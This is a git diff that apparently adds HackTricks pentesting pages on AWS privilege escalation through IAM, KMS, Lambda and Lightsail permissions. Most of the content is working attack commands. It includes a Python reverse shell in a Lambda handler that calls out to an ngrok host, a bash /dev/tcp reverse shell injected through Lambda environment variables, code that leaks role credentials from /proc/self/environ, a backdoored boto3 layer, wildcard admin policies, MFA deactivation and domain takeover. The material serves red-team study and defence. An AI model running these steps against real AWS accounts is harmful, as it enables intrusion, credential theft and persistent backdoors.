+ +### **`iam:UpdateAccessKey`** + +Allows enabling a disabled access key, potentially leading to unauthorized access if the attacker possesses the disabled key. + +**Exploit:** + +{% code overflow="wrap" %} +```bash +aws iam update-access-key --access-key-id --status Active --user-name +``` +{% endcode %} + +**Impact:** Direct privilege escalation by reactivating access keys. + +### **`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`** + +Enables generating or resetting credentials for specific AWS services (e.g., CodeCommit, Amazon Keyspaces), inheriting the permissions of the associated user. + +**Exploit for Creation:** + +{% code overflow="wrap" %} +```bash +aws iam create-service-specific-credential --user-name --service-name +``` +{% endcode %} + +**Exploit for Reset:** + +{% code overflow="wrap" %} +```bash +aws iam reset-service-specific-credential --service-specific-credential-id +``` +{% endcode %} + +**Impact:** Direct privilege escalation within the user's service permissions. + +### **`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`** + +Allows attaching policies to users or groups, directly escalating privileges by inheriting the permissions of the attached policy. + +**Exploit for User:** + +```bash +aws iam attach-user-policy --user-name --policy-arn "" +``` + +**Exploit for Group:** + +```bash +aws iam attach-group-policy --group-name --policy-arn "" +``` + +**Impact:** Direct privilege escalation to anything the policy grants. + +### **`iam:AttachRolePolicy`,** ( `sts:AssumeRole`|`iam:createrole`) | **`iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`** + +Permits attaching or putting policies to roles, users, or groups, enabling direct privilege escalation by granting additional permissions. 
+ +**Exploit for Role:** + +```bash +aws iam attach-role-policy --role-name --policy-arn "" +``` + +**Exploit for Inline Policies:** + +```bash +aws iam put-user-policy --user-name --policy-name "" \ + --policy-document "file:///path/to/policy.json" + +aws iam put-group-policy --group-name --policy-name "" \ + --policy-document file:///path/to/policy.json + +aws iam put-role-policy --role-name --policy-name "" \ + --policy-document file:///path/to/policy.json +``` + +You can use a policy like: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "*" + ], + "Resource": [ + "*" + ] + } + ] +} +``` + +**Impact:** Direct privilege escalation by adding permissions through policies. + +### **`iam:AddUserToGroup`** + +Enables adding oneself to an IAM group, escalating privileges by inheriting the group's permissions. + +**Exploit:** + +{% code overflow="wrap" %} +```bash +aws iam add-user-to-group --group-name --user-name +``` +{% endcode %} + +**Impact:** Direct privilege escalation to the level of the group's permissions. + +### **`iam:UpdateAssumeRolePolicy`** + +Allows altering the assume role policy document of a role, enabling the assumption of the role and its associated permissions. + +**Exploit:** + +```bash +aws iam update-assume-role-policy --role-name \ + --policy-document file:///path/to/assume/role/policy.json +``` + +Where the policy looks like the following, which gives the user permission to assume the role: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "sts:AssumeRole", + "Principal": { + "AWS": "$USER_ARN" + } + } + ] +} +``` + +**Impact:** Direct privilege escalation by assuming any role's permissions. + +### **`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`** + +Permits uploading an SSH public key for authenticating to CodeCommit and deactivating MFA devices, leading to potential indirect privilege escalation. 
+ +**Exploit for SSH Key Upload:** + +```bash +aws iam upload-ssh-public-key --user-name --ssh-public-key-body +``` + +**Exploit for MFA Deactivation:** + +```bash +aws iam deactivate-mfa-device --user-name --serial-number +``` + +**Impact:** Indirect privilege escalation by enabling CodeCommit access or disabling MFA protection. + +### **`iam:ResyncMFADevice`** + +Allows resynchronization of an MFA device, potentially leading to indirect privilege escalation by manipulating MFA protection. + +**Bash Command:** + +```bash +aws iam resync-mfa-device --user-name --serial-number \ + --authentication-code1 --authentication-code2 +``` + +**Impact:** Indirect privilege escalation by adding or manipulating MFA devices. + +### `iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`) + +With these permissions you can **change the XML metadata of the SAML connection**. Then, you could abuse the **SAML federation** to **login** with any **role that is trusting** it. + +Note that doing this **legit users won't be able to login**. However, you could get the XML, so you can put yours, login and configure the previous back + +```bash +# List SAMLs +aws iam list-saml-providers + +# Optional: Get SAML provider XML +aws iam get-saml-provider --saml-provider-arn + +# Update SAML provider +aws iam update-saml-provider --saml-metadata-document --saml-provider-arn + +## Login impersonating roles that trust the SAML provider + +# Optional: Set the previous XML back +aws iam update-saml-provider --saml-metadata-document --saml-provider-arn +``` + +{% hint style="info" %} +TODO: A Tool capable of generating the SAML metadata and login with a specified role +{% endhint %} + +### `iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:`**`GetOpenIDConnectProvider`**) + +(Unsure about this) If an attacker has these **permissions** he could add a new **Thumbprint** to manage to login in all the roles trusting the provider. 
+ +{% code overflow="wrap" %} +```bash +# List providers +aws iam list-open-id-connect-providers +# Optional: Get Thumbprints used to not delete them +aws iam get-open-id-connect-provider --open-id-connect-provider-arn +# Update Thumbprints (The thumbprint is always a 40-character string) +aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3 +``` +{% endcode %} + +## References + +* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md new file mode 100644 index 0000000000..ccd34ffa80 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md @@ -0,0 +1,154 @@ +# AWS - KMS Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## KMS + +For more info about KMS check: + +{% content-ref url="../aws-services/aws-kms-enum.md" %} +[aws-kms-enum.md](../aws-services/aws-kms-enum.md) +{% endcontent-ref %} + +### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`) + +With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone: + +{% code overflow="wrap" %} +```bash +aws kms list-keys +aws kms list-key-policies --key-id # Although only 1 max per key +aws kms get-key-policy --key-id --policy-name +# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default") +aws kms put-key-policy --key-id --policy-name --policy file:///tmp/policy.json +``` +{% endcode %} + +policy.json: + +```json +{ + "Version" : "2012-10-17", + "Id" : "key-consolepolicy-3", + "Statement" : [ + { + "Sid" : "Enable IAM User Permissions", + "Effect" : "Allow", + "Principal" : { + "AWS" : "arn:aws:iam:::root" + }, + "Action" : "kms:*", + "Resource" : "*" + }, + { + "Sid" : "Allow all use", + "Effect" : "Allow", + "Principal" : { + "AWS" : "arn:aws:iam:::root" + }, + "Action" : [ "kms:*" ], + "Resource" : "*" + } + ] +} +``` + +### `kms:CreateGrant` + +It **allows a principal to use a KMS key:** + +```bash +aws kms create-grant \ + --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ + --grantee-principal arn:aws:iam::123456789012:user/exampleUser \ + --operations Decrypt +``` + +{% hint style="warning" %} +A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) +{% endhint %} + +{% hint style="warning" %} +Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. 
Once that time has passed, the principal can use the KMS key without needing to specify anything.\ +However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\ +For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token). +{% endhint %} + +```bash +# Use the grant token in a request +aws kms generate-data-key \ + --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ + –-key-spec AES_256 \ + --grant-tokens $token +``` + +Note that it's possible to list grant of keys with: + +```bash +aws kms list-grants --key-id +``` + +### `kms:CreateKey`, `kms:ReplicateKey` + +With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy. + +So, an attacker could abuse this to obtain privesc his access to the key and use it + +{% code overflow="wrap" %} +```bash +aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml + +{ + "Version": "2012-10-17", + "Id": "key-consolepolicy-3", + "Statement": [ + { + "Sid": "Enable IAM User Permissions", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "kms:*", + "Resource": "*" + } + ] +} +``` +{% endcode %} + +### `kms:Decrypt` + +This permission allows to use a key to decrypt some information.\ +For more information check: + +{% content-ref url="../aws-post-exploitation/aws-kms-post-exploitation.md" %} +[aws-kms-post-exploitation.md](../aws-post-exploitation/aws-kms-post-exploitation.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md new file mode 100644 index 0000000000..57b23ef344 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md @@ -0,0 +1,329 @@ +# AWS - Lambda Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## lambda + +More info about lambda in: + +{% content-ref url="../aws-services/aws-lambda-enum.md" %} +[aws-lambda-enum.md](../aws-services/aws-lambda-enum.md) +{% endcontent-ref %} + +### `iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`) + +Users with the **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:InvokeFunction`** permissions can escalate their privileges.\ +They can **create a new Lambda function and assign it an existing IAM role**, granting the function the permissions associated with that role. The user can then **write and upload code to this Lambda function (with a rev shell for example)**.\ +Once the function is set up, the user can **trigger its execution** and the intended actions by invoking the Lambda function through the AWS API. This approach effectively allows the user to perform tasks indirectly through the Lambda function, operating with the level of access granted to the IAM role associated with it.\\ + +A attacker could abuse this to get a **rev shell and steal the token**: + +{% code title="rev.py" %} +```python +import socket,subprocess,os,time +def lambda_handler(event, context): + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); + s.connect(('4.tcp.ngrok.io',14305)) + os.dup2(s.fileno(),0) + os.dup2(s.fileno(),1) + os.dup2(s.fileno(),2) + p=subprocess.call(['/bin/sh','-i']) + time.sleep(900) + return 0 +``` +{% endcode %} + +```bash +# Zip the rev shell +zip "rev.zip" "rev.py" + +# Create the function +aws lambda create-function --function-name my_function \ + --runtime python3.9 --role \ + --handler rev.lambda_handler --zip-file fileb://rev.zip + +# Invoke the function +aws lambda invoke --function-name my_function output.txt +## If you have the lambda:InvokeFunctionUrl permission you need to expose the lambda inan URL and execute it via the URL + +# List roles +aws iam list-attached-user-policies --user-name +``` + +You could also **abuse the lambda role 
permissions** from the lambda function itself.\ +If the lambda role had enough permissions you could use it to grant admin rights to you: + +```python +import boto3 +def lambda_handler(event, context): + client = boto3.client('iam') + response = client.attach_user_policy( + UserName='my_username', + PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess' + ) + return response +``` + +It is also possible to leak the lambda's role credentials without needing an external connection. This would be useful for **Network isolated Lambdas** used on internal tasks. If there are unknown security groups filtering your reverse shells, this piece of code will allow you to directly leak the credentials as the output of the lambda. + +```python +def handler(event, context): +    sessiontoken = open('/proc/self/environ', "r").read() +    return { +        'statusCode': 200, +        'session': str(sessiontoken) +    } +``` + +```bash +aws lambda invoke --function-name output.txt +cat output.txt +``` + +**Potential Impact:** Direct privesc to the arbitrary lambda service role specified. + +{% hint style="danger" %} +Note that even if it might looks interesting **`lambda:InvokeAsync`** **doesn't** allow on it's own to **execute `aws lambda invoke-async`**, you also need `lambda:InvokeFunction` +{% endhint %} + +### `iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission` + +Like in the previous scenario, you can **grant yourself the `lambda:InvokeFunction`** permission if you have the permission **`lambda:AddPermission`** + +```bash +# Check the previous exploit and use the following line to grant you the invoke permissions +aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \ + --action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN" +``` + +**Potential Impact:** Direct privesc to the arbitrary lambda service role specified. 
+ +### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateEventSourceMapping` + +Users with **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:CreateEventSourceMapping`** permissions (and potentially `dynamodb:PutItem` and `dynamodb:CreateTable`) can indirectly **escalate privileges** even without `lambda:InvokeFunction`.\ +They can create a **Lambda function with malicious code and assign it an existing IAM role**. + +Instead of directly invoking the Lambda, the user sets up or utilizes an existing DynamoDB table, linking it to the Lambda through an event source mapping. This setup ensures the Lambda function is **triggered automatically upon a new item** entry in the table, either by the user's action or another process, thereby indirectly invoking the Lambda function and executing the code with the permissions of the passed IAM role. + +```bash +aws lambda create-function --function-name my_function \ + --runtime python3.8 --role \ + --handler lambda_function.lambda_handler \ + --zip-file fileb://rev.zip +``` + +If DynamoDB is already active in the AWS environment, the user only **needs to establish the event source mapping** for the Lambda function. 
However, if DynamoDB isn't in use, the user must **create a new table** with streaming enabled: + +```bash +aws dynamodb create-table --table-name my_table \ + --attribute-definitions AttributeName=Test,AttributeType=S \ + --key-schema AttributeName=Test,KeyType=HASH \ + --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ + --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES +``` + +Now it's posible **connect the Lambda function to the DynamoDB table** by **creating an event source mapping**: + +```bash +aws lambda create-event-source-mapping --function-name my_function \ + --event-source-arn \ + --enabled --starting-position LATEST +``` + +With the Lambda function linked to the DynamoDB stream, the attacker can **indirectly trigger the Lambda by activating the DynamoDB stream**. This can be accomplished by **inserting an item** into the DynamoDB table: + +```bash +aws dynamodb put-item --table-name my_table \ + --item Test={S="Random string"} +``` + +**Potential Impact:** Direct privesc to the lambda service role specified. + +### `lambda:AddPermission` + +An attacker with this permission can **grant himself (or others) any permissions** (this generates resource based policies to grant access to the resource): + +{% code overflow="wrap" %} +```bash +# Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode) +aws lambda add-permission --function-name --statement-id asdasd --action '*' --principal arn: + +# Invoke the function +aws lambda invoke --function-name /tmp/outout +``` +{% endcode %} + +**Potential Impact:** Direct privesc to the lambda service role used by granting permission to modify the code and run it. + +### `lambda:AddLayerVersionPermission` + +An attacker with this permission can **grant himself (or others) the permission `lambda:GetLayerVersion`**. 
He could access the layer and search for vulnerabilities or sensitive information + +{% code overflow="wrap" %} +```bash +# Give everyone the permission lambda:GetLayerVersion +aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion +``` +{% endcode %} + +**Potential Impact:** Potential access to sensitive information. + +### `lambda:UpdateFunctionCode` + +Users holding the **`lambda:UpdateFunctionCode`** permission has the potential to **modify the code of an existing Lambda function that is linked to an IAM role.**\ +The attacker can **modify the code of the lambda to exfiltrate the IAM credentials**. + +Although the attacker might not have the direct ability to invoke the function, if the Lambda function is pre-existing and operational, it's probable that it will be triggered through existing workflows or events, thus indirectly facilitating the execution of the modified code. + +{% code overflow="wrap" %} +```bash +# The zip should contain the lambda code (trick: Download the current one and add your code there) +aws lambda update-function-code --function-name target_function \ + --zip-file fileb:///my/lambda/code/zipped.zip + +# If you have invoke permissions: +aws lambda invoke --function-name my_function output.txt + +# If not check if it's exposed in any URL or via an API gateway you could access +``` +{% endcode %} + +**Potential Impact:** Direct privesc to the lambda service role used. + +### `lambda:UpdateFunctionConfiguration` + +#### RCE via env variables + +With this permissions it's possible to add environment variables that will cause the Lambda to execute arbitrary code. 
For example in python it's possible to abuse the environment variables `PYTHONWARNING` and `BROWSER` to make a python process execute arbitrary commands: + +{% code overflow="wrap" %} +```bash +aws --profile none-priv lambda update-function-configuration --function-name --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}" +``` +{% endcode %} + +For other scripting languages there are other env variables you can use. For more info check the subsections of scripting languages in: + +{% embed url="https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse" %} + +#### RCE via Lambda Layers + +[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) allows to include **code** in your lamdba function but **storing it separately**, so the function code can stay small and **several functions can share code**. + +Inside lambda you can check the paths from where python code is loaded with a function like the following: + +```python +import json +import sys + +def lambda_handler(event, context): + print(json.dumps(sys.path, indent=2)) +``` + +These are the places: + +1. /var/task +2. /opt/python/lib/python3.7/site-packages +3. /opt/python +4. /var/runtime +5. /var/lang/lib/python37.zip +6. /var/lang/lib/python3.7 +7. /var/lang/lib/python3.7/lib-dynload +8. /var/lang/lib/python3.7/site-packages +9. /opt/python/lib/python3.7/site-packages +10. /opt/python + +For example, the library boto3 is loaded from `/var/runtime/boto3` (4th position). + +#### Exploitation + +It's possible to abuse the permission `lambda:UpdateFunctionConfiguration` to **add a new layer** to a lambda function. 
To execute arbitrary code this layer need to contain some **library that the lambda is going to import.** If you can read the code of the lambda, you could find this easily, also note that it might be possible that the lambda is **already using a layer** and you could **download** the layer and **add your code** in there. + +For example, lets suppose that the lambda is using the library boto3, this will create a local layer with the last version of the library: + +```bash +pip3 install -t ./lambda_layer boto3 +``` + +You can open `./lambda_layer/boto3/__init__.py` and **add the backdoor in the global code** (a function to exfiltrate credentials or get a reverse shell for example). + +Then, zip that `./lambda_layer` directory and **upload the new lambda layer** in your own account (or in the victims one, but you might not have permissions for this).\ +Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **compatible with the python version** used by the lambda and if you upload it to your account, it needs to be in the **same region:** + +{% code overflow="wrap" %} +```bash +aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6" +``` +{% endcode %} + +Now, make the uploaded lambda layer **accessible by any account**: + +```bash +aws lambda add-layer-version-permission --layer-name boto3 \ + --version-number 1 --statement-id public \ + --action lambda:GetLayerVersion --principal * +``` + +And attach the lambda layer to the victim lambda function: + +```bash +aws lambda update-function-configuration \ + --function-name \ + --layers arn:aws:lambda:::layer:boto3:1 \ + --timeout 300 #5min for rev shells +``` + +The next step would be to either **invoke the function** ourselves if we can or to wait until i**t gets invoked** by normal means–which is 
the safer method. + +A **more stealth way to exploit this vulnerability** can be found in: + +{% content-ref url="../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md" %} +[aws-lambda-layers-persistence.md](../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md) +{% endcontent-ref %} + +**Potential Impact:** Direct privesc to the lambda service role used. + +### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateFunctionUrlConfig`, `lambda:InvokeFunctionUrl` + +Maybe with those permissions you are able to create a function and execute it calling the URL... but I could find a way to test it, so let me know if you do! + +### Lambda MitM + +Some lambdas are going to be **receiving sensitive info from the users in parameters.** If get RCE in one of them, you can exfiltrate the info other users are sending to it, check it in: + +{% content-ref url="../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md" %} +[aws-warm-lambda-persistence.md](../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md) +{% endcontent-ref %} + +## References + +* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) +* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md new file mode 100644 index 0000000000..95ec107578 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md @@ -0,0 +1,195 @@ +# AWS - Lightsail Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Lightsail + +For more information about Lightsail check: + +{% content-ref url="../aws-services/aws-lightsail-enum.md" %} +[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md) +{% endcontent-ref %} + +{% hint style="warning" %} +It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service. +{% endhint %} + +### `lightsail:DownloadDefaultKeyPair` + +This permission will allow you to get the SSH keys to access the instances: + +``` +aws lightsail download-default-key-pair +``` + +**Potential Impact:** Find sensitive info inside the instances. + +### `lightsail:GetInstanceAccessDetails` + +This permission will allow you to generate SSH keys to access the instances: + +```bash +aws lightsail get-instance-access-details --instance-name +``` + +**Potential Impact:** Find sensitive info inside the instances. + +### `lightsail:CreateBucketAccessKey` + +This permission will allow you to get a key to access the bucket: + +```bash +aws lightsail create-bucket-access-key --bucket-name +``` + +**Potential Impact:** Find sensitive info inside the bucket. + +### `lightsail:GetRelationalDatabaseMasterUserPassword` + +This permission will allow you to get the credentials to access the database: + +```bash +aws lightsail get-relational-database-master-user-password --relational-database-name +``` + +**Potential Impact:** Find sensitive info inside the database. 
+ +### `lightsail:UpdateRelationalDatabase` + +This permission will allow you to change the password to access the database: + +{% code overflow="wrap" %} +```bash +aws lightsail update-relational-database --relational-database-name --master-user-password +``` +{% endcode %} + +If the database isn't public, you could also make it public with this permissions with + +{% code overflow="wrap" %} +```bash +aws lightsail update-relational-database --relational-database-name --publicly-accessible +``` +{% endcode %} + +**Potential Impact:** Find sensitive info inside the database. + +### `lightsail:OpenInstancePublicPorts` + +This permission allow to open ports to the Internet + +```bash +aws lightsail open-instance-public-ports \ + --instance-name MEAN-2 \ + --port-info fromPort=22,protocol=TCP,toPort=22 +``` + +**Potential Impact:** Access sensitive ports. + +### `lightsail:PutInstancePublicPorts` + +This permission allow to open ports to the Internet. Note taht the call will close any port opened not specified on it. + +```bash +aws lightsail put-instance-public-ports \ + --instance-name MEAN-2 \ + --port-infos fromPort=22,protocol=TCP,toPort=22 +``` + +**Potential Impact:** Access sensitive ports. + +### `lightsail:SetResourceAccessForBucket` + +This permissions allows to give an instances access to a bucket without any extra credentials + +{% code overflow="wrap" %} +```bash +aws set-resource-access-for-bucket \ + --resource-name \ + --bucket-name \ + --access allow +``` +{% endcode %} + +**Potential Impact:** Potential new access to buckets with sensitive information. 
+ +### `lightsail:UpdateBucket` + +With this permission an attacker could grant his own AWS account read access over buckets or even make the buckets public to everyone: + +```bash +# Grant read access to exterenal account +aws update-bucket --bucket-name --readonly-access-accounts + +# Grant read to the public +aws update-bucket --bucket-name --access-rules getObject=public,allowPublicOverrides=true + +# Bucket private but single objects can be public +aws update-bucket --bucket-name --access-rules getObject=private,allowPublicOverrides=true +``` + +**Potential Impact:** Potential new access to buckets with sensitive information. + +### `lightsail:UpdateContainerService` + +With this permissions an attacker could grant access to private ECRs from the containers service + +```bash +aws update-container-service \ + --service-name \ + --private-registry-access ecrImagePullerRole={isActive=boolean} +``` + +**Potential Impact:** Get sensitive information from private ECR + +### `lightsail:CreateDomainEntry` + +An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address. + +```bash +aws lightsail create-domain-entry \ + --domain-name example.com \ + --domain-entry name=dev.example.com,type=A,target=192.0.2.0 +``` + +**Potential Impact:** Takeover a domain + +### `lightsail:UpdateDomainEntry` + +An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address. 
+ +```bash +aws lightsail update-domain-entry \ + --domain-name example.com \ + --domain-entry name=dev.example.com,type=A,target=192.0.2.0 +``` + +**Potential Impact:** Takeover a domain + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
